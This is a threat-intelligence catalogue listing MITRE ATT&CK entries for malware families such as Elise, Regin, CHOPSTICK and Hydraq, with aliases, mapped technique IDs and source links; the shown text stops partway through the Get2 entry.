[Elise](https://attack.mitre.org/software/S0081) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It is part of a larger group of tools referred to as LStudio, ST Group, and APT0LSTU. (Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018)

The tag is: misp-galaxy:mitre-malware="Elise - S0081"

Elise - S0081 is also known as:

Elise
BKDR_ESILE
Page

View relationships graph

Elise - S0081 has relationships with:

similar: misp-galaxy:tool="Elise Backdoor" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Elise" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

Table 4688. Table References
Links
https://attack.mitre.org/software/S0081
https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html
https://www.accenture.com/t20180127T003755Z_w_/us-en/acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf[https://www.accenture.com/t20180127T003755Z_w/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf]

Sykipot - S0018

[Sykipot](https://attack.mitre.org/software/S0018) is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of [Sykipot](https://attack.mitre.org/software/S0018) hijacks smart cards on victims. (Citation: Alienvault Sykipot DOD Smart Cards) The group using this malware has also been referred to as Sykipot. (Citation: Blasco 2013)

The tag is: misp-galaxy:mitre-malware="Sykipot - S0018"

Sykipot - S0018 is also known as:

Sykipot

View relationships graph

Sykipot - S0018 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Two-Factor Authentication Interception - T1111" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

Table 4689. Table References
Links
https://attack.mitre.org/software/S0018
https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards
http://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments

Volgmer - S0180

[Volgmer](https://attack.mitre.org/software/S0180) is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing. (Citation: US-CERT Volgmer Nov 2017)

The tag is: misp-galaxy:mitre-malware="Volgmer - S0180"

Volgmer - S0180 is also known as:

Volgmer

View relationships graph

Volgmer - S0180 has relationships with:

similar: misp-galaxy:tool="Volgmer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Volgmer" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 4690. Table References
Links
https://attack.mitre.org/software/S0180
https://www.us-cert.gov/ncas/alerts/TA17-318B
https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-D_WHITE_S508C.PDF
https://www.symantec.com/security-center/writeup/2014-081811-3237-99?tabid=2

Epic - S0091

[Epic](https://attack.mitre.org/software/S0091) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Kaspersky Turla)

The tag is: misp-galaxy:mitre-malware="Epic - S0091"

Epic - S0091 is also known as:

Epic
Tavdig
Wipbot
WorldCupSec
TadjMakhal

View relationships graph

Epic - S0091 has relationships with:

similar: misp-galaxy:tool="Wipbot" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Wipbot" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Archive via Library - T1560.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1055.011" with estimative-language:likelihood-probability="almost-certain"

Table 4691. Table References
Links
https://attack.mitre.org/software/S0091
https://securelist.com/the-epic-turla-operation/65545/

Regin - S0019

[Regin](https://attack.mitre.org/software/S0019) is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some [Regin](https://attack.mitre.org/software/S0019) timestamps date back to 2003. (Citation: Kaspersky Regin)

The tag is: misp-galaxy:mitre-malware="Regin - S0019"

Regin - S0019 is also known as:

Regin

View relationships graph

Regin - S0019 has relationships with:

similar: misp-galaxy:tool="Regin" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Regin" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden File System - T1564.005" with estimative-language:likelihood-probability="almost-certain"

Table 4692. Table References
Links
https://attack.mitre.org/software/S0019
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf

Chaos - S0220

[Chaos](https://attack.mitre.org/software/S0220) is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets. (Citation: Chaos Stolen Backdoor)

The tag is: misp-galaxy:mitre-malware="Chaos - S0220"

Chaos - S0220 is also known as:

Chaos

View relationships graph

Chaos - S0220 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205" with estimative-language:likelihood-probability="almost-certain"

Table 4693. Table References
Links
https://attack.mitre.org/software/S0220
http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/

Uroburos - S0022

[Uroburos](https://attack.mitre.org/software/S0022) is a rootkit used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Kaspersky Turla)

The tag is: misp-galaxy:mitre-malware="Uroburos - S0022"

Uroburos - S0022 is also known as:

Uroburos

View relationships graph

Uroburos - S0022 has relationships with:

similar: misp-galaxy:tool="Turla" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Uroburos (Windows)" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

Table 4694. Table References
Links
https://attack.mitre.org/software/S0022
https://securelist.com/the-epic-turla-operation/65545/

adbupd - S0202

[adbupd](https://attack.mitre.org/software/S0202) is a backdoor used by [PLATINUM](https://attack.mitre.org/groups/G0068) that is similar to [Dipsind](https://attack.mitre.org/software/S0200). (Citation: Microsoft PLATINUM April 2016)

The tag is: misp-galaxy:mitre-malware="adbupd - S0202"

adbupd - S0202 is also known as:

adbupd

View relationships graph

adbupd - S0202 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

Table 4695. Table References
Links
https://attack.mitre.org/software/S0202
https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

CHOPSTICK - S0023

[CHOPSTICK](https://attack.mitre.org/software/S0023) is a malware family of modular backdoors used by [APT28](https://attack.mitre.org/groups/G0007). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) (Citation: DOJ GRU Indictment Jul 2018) It is tracked separately from the [X-Agent for Android](https://attack.mitre.org/software/S0314).

The tag is: misp-galaxy:mitre-malware="CHOPSTICK - S0023"

CHOPSTICK - S0023 is also known as:

CHOPSTICK
Backdoor.SofacyX
SPLM
Xagent
X-Agent
webhp

View relationships graph

CHOPSTICK - S0023 has relationships with:

similar: misp-galaxy:tool="CHOPSTICK" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="X-Agent" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="X-Agent (Android)" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Communication Through Removable Media - T1092" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

Table 4696. Table References
Links
https://attack.mitre.org/software/S0023
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf
https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
https://www.justice.gov/file/1080281/download
https://www.symantec.com/blogs/election-security/apt28-espionage-military-government

DroidJack - S0320

[DroidJack](https://attack.mitre.org/software/S0320) is an Android remote access tool that has been observed posing as legitimate applications including the Super Mario Run and Pokemon GO games. (Citation: Zscaler-SuperMarioRun) (Citation: Proofpoint-Droidjack)

The tag is: misp-galaxy:mitre-malware="DroidJack - S0320"

DroidJack - S0320 is also known as:

DroidJack

View relationships graph

DroidJack - S0320 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"

Table 4697. Table References
Links
https://attack.mitre.org/software/S0320
https://www.zscaler.com/blogs/research/super-mario-run-malware-2-–-droidjack-rat
https://www.proofpoint.com/us/threat-insight/post/droidjack-uses-side-load-backdoored-pokemon-go-android-app

Hydraq - S0203

[Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025). (Citation: MicroFocus 9002 Aug 2016) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010) (Citation: ASERT Seven Pointed Dagger Aug 2015) (Citation: FireEye DeputyDog 9002 November 2013) (Citation: ProofPoint GoT 9002 Aug 2017) (Citation: FireEye Sunshop Campaign May 2013) (Citation: PaloAlto 3102 Sept 2015)

The tag is: misp-galaxy:mitre-malware="Hydraq - S0203"

Hydraq - S0203 is also known as:

Hydraq
Aurora
9002 RAT

View relationships graph

Hydraq - S0203 has relationships with:

similar: misp-galaxy:tool="Aurora" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="9002 RAT" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Aurora" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

Table 4698. Table References
Links
https://attack.mitre.org/software/S0203
https://community.softwaregrp.com/t5/Security-Research/9002-RAT-a-second-building-on-the-left/ba-p/228686#.WosBVKjwZPZ
https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf
https://www.symantec.com/connect/blogs/trojanhydraq-incident
https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf
https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html
https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures
https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html
https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/

ZeroT - S0230

[ZeroT](https://attack.mitre.org/software/S0230) is a Trojan used by [TA459](https://attack.mitre.org/groups/G0062), often in conjunction with [PlugX](https://attack.mitre.org/software/S0013). (Citation: Proofpoint TA459 April 2017) (Citation: Proofpoint ZeroT Feb 2017)

The tag is: misp-galaxy:mitre-malware="ZeroT - S0230"

ZeroT - S0230 is also known as:

ZeroT

View relationships graph

ZeroT - S0230 has relationships with:

similar: misp-galaxy:tool="ZeroT" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="ZeroT" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1001.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

Table 4699. Table References
Links
https://attack.mitre.org/software/S0230
https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts
https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx

Twitoor - S0302

[Twitoor](https://attack.mitre.org/software/S0302) is a dropper application capable of receiving commands from social media.(Citation: ESET-Twitoor)

The tag is: misp-galaxy:mitre-malware="Twitoor - S0302"

Twitoor - S0302 is also known as:

Twitoor

View relationships graph

Twitoor - S0302 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1521" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Service - T1481" with estimative-language:likelihood-probability="almost-certain"

Table 4700. Table References
Links
https://attack.mitre.org/software/S0302
http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/

Get2 - S0460

[Get2](https://attack.mitre.org/software/S0460) is a downloader written in C++ that has been used by [TA505](https://attack.mitre.org/groups/G0092) to deliver [FlawedGrace](https://attack.mitre.org/software/S0383), [FlawedAmmyy](https://attack.mitre.org/software/S0381), Snatch and [SDBbot](https://attack.mitre.org/software/S0461).(Citation: Proofpoint TA505 October 2019)

The tag is: misp-galaxy:mitre-malware="Get2 - S0460"

Get2 - S0460 is also known as:

Get2

View relationships graph

Get2 - S0460 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
